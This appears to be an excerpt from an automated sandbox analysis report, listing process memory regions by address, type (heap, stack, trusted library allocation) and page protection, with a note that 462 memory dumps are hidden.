12C6DF70000
heap
page read and write
1346FF9E000
trusted library allocation
page read and write
21324E90000
trusted library allocation
page read and write
13470184000
heap
page read and write
134708F0000
trusted library allocation
page read and write
134706CB000
heap
page read and write
1347039C000
heap
page read and write
4C3EFFE000
stack
page read and write
134706BA000
heap
page read and write
1346FF6F000
trusted library allocation
page read and write
1346FF1B000
trusted library allocation
page read and write
13470411000
heap
page read and write
21324D40000
trusted library allocation
page read and write
1CF86B85000
heap
page read and write
4C3E0FE000
unkown
page readonly
1347055E000
trusted library allocation
page read and write
134706A6000
heap
page read and write
21324D70000
trusted library allocation
page read and write
1346FDE6000
heap
page read and write
1347072A000
heap
page read and write
1347037B000
heap
page read and write
134704E1000
heap
page read and write
1347062F000
heap
page read and write
12C6E074000
heap
page read and write
134704C1000
heap
page read and write
134704E8000
heap
page read and write
13470AA0000
trusted library allocation
page read and write
1CF86B80000
heap
page read and write
134707F0000
trusted library allocation
page read and write
21320930000
trusted library section
page readonly
12C6E156000
heap
page read and write
13470656000
heap
page read and write
134705F0000
heap
page read and write
21324E80000
trusted library allocation
page read and write
134707DE000
heap
page read and write
134706C4000
heap
page read and write
21324D60000
trusted library allocation
page read and write
134704C7000
heap
page read and write
There are 462 hidden memdumps, click here to show them.